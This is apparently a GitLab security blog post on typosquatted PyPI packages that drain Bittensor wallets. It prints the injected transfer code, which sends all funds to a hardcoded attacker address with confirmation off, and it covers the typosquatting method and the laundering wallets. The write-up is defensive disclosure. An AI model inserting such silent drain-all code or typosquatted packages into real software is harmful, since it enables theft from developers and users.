GitLab uncovers Bittensor theft campaign via PyPI

GitLab's Vulnerability Research team has identified a sophisticated cryptocurrency theft campaign targeting the Bittensor ecosystem through typosquatted Python packages on PyPI. Our investigation began when GitLab's automated package monitoring system flagged suspicious activity related to popular Bittensor packages. We discovered multiple typosquatted variations of legitimate Bittensor packages, each designed to steal cryptocurrency from unsuspecting developers and users. The identified malicious packages were all published within a 25-minute window on August 6, 2025:

• [email protected] (02:52 UTC) - [email protected] (02:59 UTC) - [email protected] (03:02 UTC) - [email protected] (03:15 UTC) - [email protected] (03:16 UTC) All packages were designed to mimic the legitimate bittensor and bittensor-cli packages, which are core components of the Bittensor decentralized AI network.

Technical analysis: How the theft occurs

Our analysis revealed a carefully crafted attack vector where the attackers modified legitimate staking functionality to steal funds. The malicious packages contain a hijacked version of the stake_extrinsic function in bittensor_cli/src/commands/stake/add.py. Where users expect a normal staking operation, the attackers inserted malicious code at line 275 that silently diverts all funds to their wallet:

        subtensor=subtensor,
  wallet=wallet,
  destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
  amount=amount,
  transfer_all=True,
  prompt=False
)

    

This malicious injection completely subverts the staking process:

• Silent execution: Uses prompt=False to bypass user confirmation - Complete wallet drain: Sets transfer_all=True to steal all available funds, not just the staking amount - Hardcoded destination: Routes all funds to the attacker's wallet address - Hidden in plain sight: Executes during what appears to be a normal staking operation The attack is particularly insidious as users believe they're staking tokens to earn rewards, but instead, the modified function empties their entire wallet.

Why target staking functionality?

The attackers appear to have specifically targeted staking operations for calculated reasons. In blockchain networks like Bittensor, staking is when users lock up their cryptocurrency tokens to support network operations, earning rewards in return, similar to earning interest on a deposit. This makes staking an ideal attack vector:

1. High-value targets: Users who stake typically hold substantial cryptocurrency holdings, making them lucrative victims. 2. Required wallet access: Staking operations require users to unlock their wallets and provide authentication—giving the malicious code exactly what it needs to drain funds. 3. Expected network activity: Since staking naturally involves blockchain transactions, the additional malicious transfer doesn't immediately raise suspicions. 4. Routine operations: Experienced users stake regularly, creating familiarity that breeds complacency and reduces scrutiny. 5. Delayed detection: Users might initially assume any balance changes are normal staking fees or temporary holds, delaying discovery of the theft. By hiding malicious code within legitimate-looking staking functionality, the attackers exploited both the technical requirements and user psychology of routine blockchain operations.

Following the money

GitLab's Vulnerability Research team traced the cryptocurrency flows to understand the full scope of this operation. The primary destination wallet 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR served as a central collection point before funds were distributed through a network of intermediary wallets.

The money laundering network

Our analysis revealed a multi-hop laundering scheme:

1. Primary collection: Stolen funds initially arrive at 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR 2. Distribution network: Funds are quickly moved to intermediate wallets including:
   • 5HpsyxZKvCvLEdLTkWRM4d7nHPnXcbm4ayAsJoaVVW2TLVP1
   • 5GiqMKy1kAXN6j9kCuog59VjoJXUL2GnVSsmCRyHkggvhqNC
   • 5ER5ojwWNF79k5wvsJhcgvWmHkhKfW5tCFzDpj1Wi4oUhPs6
   • 5CquBemBzAXx9GtW94qeHgPya8dgvngYXZmYTWqnpea5nsiL
2. Final consolidation: All paths eventually converge at 5D6BH6ai79EVN51orsf9LG3k1HXxoEhPaZGeKBT5oDwnd2Bu 4. Cash-out endpoint: Final destination appears to be 5HDo9i9XynX44DFjeoabFqPF3XXmFCkJASC7FxWpbqv6D7QQ

The typosquatting strategy

The attackers employed a typosquatting strategy that exploits common typing errors and package naming conventions:

• Missing characters: bitensor instead of bittensor (missing 't') - Truncation: bittenso instead of bittensor (missing final 'r') - Version mimicking: All packages used version numbers (9.9.4, 9.9.5) that closely match legitimate package versions This approach maximizes the chance of installation through developer typos during pip install commands and copy-paste errors from documentation.

Looking ahead: The future of supply chain security

GitLab continues to invest in proactive security research to identify and neutralize threats before they impact our community. Our automated detection system works around the clock to protect the software supply chain that powers modern development. The swift detection and analysis of this attack demonstrate the value of proactive security measures in combating sophisticated threats. By sharing our findings, we aim to strengthen the entire ecosystem's resilience against future attacks.

Indicators of compromise

Timeline